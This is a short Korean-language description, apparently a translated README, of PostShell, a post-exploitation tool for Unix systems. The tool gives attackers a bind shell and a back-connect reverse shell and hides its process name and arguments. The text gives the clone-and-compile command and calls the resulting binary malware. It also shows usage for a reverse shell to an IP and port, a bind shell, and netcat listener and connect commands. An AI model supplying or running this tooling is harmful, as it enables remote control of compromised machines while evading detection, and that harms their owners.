
PostShell - 사후 익스플로잇 Bind/Backconnect Shell
PostShell은 바인드(bind) 셸과 백 커넥트(back connect) 셸을 모두 포함하는 포스트 익스플로잇(post-exploitation) 셸입니다. 완전한 대화형 TTY를 생성하여 작업 제어(job control)가 가능합니다. 스텁 크기는 약 14KB이며 Unix 계열 시스템에서 컴파일할 수 있습니다.
연결이 시작된 후의 배너 및 셸과의 상호 작용.
PostShell은 Python, Perl과 같은 종속성에 대한 의존도를 낮춰 공격자가 보다 쉽게 포스트 익스플로잇을 수행할 수 있도록 합니다. 또한 백 커넥트 셸과 바인드 셸을 모두 포함하여 대상이 아웃바운드 연결을 허용하지 않는 경우 운영자가 간단히 바인드 셸을 시작하고 원격으로 시스템에 연결할 수 있습니다. PostShell은 프로세스 이름과 인수가 모두 숨겨지기 때문에 기존 셸보다 훨씬 덜 의심스럽습니다.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
이렇게 하면 "stub"이라는 바이너리가 생성됩니다. 이것이 악성코드입니다.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
백 커넥트(Back Connect):
$ ./stub 127.0.0.1 13377
바인드 셸(Bind Shell):
$ ./stub 13377
백 커넥트 수신:
$ nc -vlp port
바인드 셸에 연결:
$ nc host port